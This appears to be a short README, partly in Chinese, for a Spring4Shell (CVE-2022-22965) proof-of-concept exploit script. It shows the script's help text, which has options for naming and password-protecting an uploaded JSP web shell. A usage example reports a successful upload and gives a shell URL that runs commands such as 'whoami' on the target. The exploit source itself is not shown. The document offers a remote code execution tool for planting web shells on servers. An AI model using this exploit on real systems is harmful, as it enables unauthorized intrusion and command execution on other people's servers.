CVE-2022-22965 PoC — Spring Framework 代码注入漏洞

Description

User friendly Spring4Shell POC

介绍

# Spring4Shell-CVE-2022-22965-POC

```bash
ghost㉿uchiha:~$ ./exploit.py --help                                     
usage: exploit.py [-h] [-f FILENAME] [-p PASSWORD] [-d DIRECTORY] url

Spring4Shell RCE Proof of Concept

positional arguments:
  url                   Target URL

options:
  -h, --help            show this help message and exit
  -f FILENAME, --filename FILENAME
                        Name of the file to upload (Default tomcatwar.jsp)
  -p PASSWORD, --password PASSWORD
                        Password to protect the shell with (Default: thm)
  -d DIRECTORY, --directory DIRECTORY
                        The upload path for the file (Default: ROOT)
```


## Usage
```bash
ghost㉿uchiha:~$ ./exploit.py http://url/
Shell Uploaded Successfully!
Your shell can be found at: http://url/tomcatwar.jsp?pwd=evil&cmd=whoami
```

Modified version of https://github.com/BobTheShoplifter/Spring4Shell-POC

文件快照

备注